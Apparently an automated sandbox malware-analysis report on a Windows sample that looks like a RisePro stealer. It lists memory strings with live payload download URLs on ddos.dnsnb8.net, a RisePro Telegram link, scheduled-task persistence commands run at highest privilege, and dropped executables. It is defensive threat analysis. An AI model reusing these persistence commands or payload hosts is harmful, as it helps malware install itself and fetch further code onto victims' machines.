            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarExh
            Source: jHYZko.exe, 00000010.00000003.2369312075.0000000000C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtp
            Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarm
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rartC:
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar=x
            Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarZ
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarfC:
            Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
            Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
            Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarL
            Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarO
            Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarR
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarpy_
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar(y
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarC:
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarHxg
            Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarsC:
            Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.drString found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
            Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.drString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
            Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.drString found in binary or memory: http://pki-ocsp.symauth.com0
            Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
            Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
            Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
            Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
            Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
            Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
            Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
            Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
            Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
            Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
            Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4459917823.00000000021A7000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.4459782824.0000000001667000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000000F.00000002.4459264135.0000000001AAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
            Source: MPGPH131.exe, 00000007.00000002.4459389526.00000000013AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTz
            Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
            Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
            Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_6cbc74d6-1

            System Summary

            barindex
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name: pL~u
            Source: RageMP131.exe.0.drStatic PE information: section name: pL~u
            Source: MPGPH131.exe.0.drStatic PE information: section name: pL~u
            Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
            Source: jHYZko.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0109991F0_2_0109991F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_010319400_2_01031940
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FB20400_2_00FB2040
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_010AD1E10_2_010AD1E1
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0108A8000_2_0108A800
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FCA1000_2_00FCA100
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FB22C00_2_00FB22C0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FC42A00_2_00FC42A0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_0103BBB00_2_0103BBB0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FBAB500_2_00FBAB50
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_01034C200_2_01034C20
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_010907500_2_01090750
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_01093ED80_2_01093ED8
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FBA7200_2_00FBA720
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_010206F00_2_010206F0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA0B230_2_7ECA0B23
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_7ECA00000_2_7ECA0000
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E660761_2_00E66076
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E66D001_2_00E66D00
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_005720407_2_00572040
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0064A8007_2_0064A800
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_005F19407_2_005F1940
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0058A1007_2_0058A100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0065991F7_2_0065991F
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_005722C07_2_005722C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_005842A07_2_005842A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0057AB507_2_0057AB50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_005FBBB07_2_005FBBB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_005F4C207_2_005F4C20
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_005E06F07_2_005E06F0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_00653ED87_2_00653ED8
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_006507507_2_00650750
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_0057A7207_2_0057A720
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_7F220B237_2_7F220B23
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 7_2_7F2200007_2_7F220000
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_005720408_2_00572040
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0064A8008_2_0064A800
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_005F19408_2_005F1940
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0058A1008_2_0058A100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0065991F8_2_0065991F
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_005722C08_2_005722C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_005842A08_2_005842A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0057AB508_2_0057AB50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_005FBBB08_2_005FBBB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_005F4C208_2_005F4C20
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_005E06F08_2_005E06F0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_00653ED88_2_00653ED8
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_006507508_2_00650750
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0057A7208_2_0057A720
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_006BC7178_2_006BC717
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_7F220B238_2_7F220B23
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_7F2200008_2_7F220000
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\jHYZko.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: String function: 0064D940 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612
            Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_89.exe
            Source: Lisect_AVT_24003_G1A_89.exeBinary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_89.exe
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: jHYZko.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jHYZko.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: jHYZko.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: Section: ZLIB complexity 0.9996907199023861
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: Section: ZLIB complexity 0.9966460129310345
            Source: Lisect_AVT_24003_G1A_89.exeStatic PE information: Section: ZLIB complexity 0.9948046875
            Source: RageMP131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9996907199023861
            Source: RageMP131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9966460129310345
            Source: RageMP131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9948046875
            Source: MPGPH131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9996907199023861
            Source: MPGPH131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9966460129310345
            Source: MPGPH131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9948046875
            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@27/31@1/2
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeCode function: 1_2_00E6119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_00E6119F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeCode function: 0_2_00FBAB50 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,0_2_00FBAB50
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeFile created: C:\Users\user\AppData\Local\RageMP131Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6484
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeFile created: C:\Users\user\AppData\Local\Temp\jHYZko.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: Lisect_AVT_24003_G1A_89.exeReversingLabs: Detection: 94%
            Source: Lisect_AVT_24003_G1A_89.exeVirustotal: Detection: 86%
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeFile read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe"
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeProcess created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612
            Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exe
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeProcess created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exeJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHESTJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess created: C:\Users\user\AppData\Local\Temp\jHYZko.exe C:\Users\user\AppData\Local\Temp\jHYZko.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\jHYZko.exeSection loaded: ntvdm64.dllJump to behavior
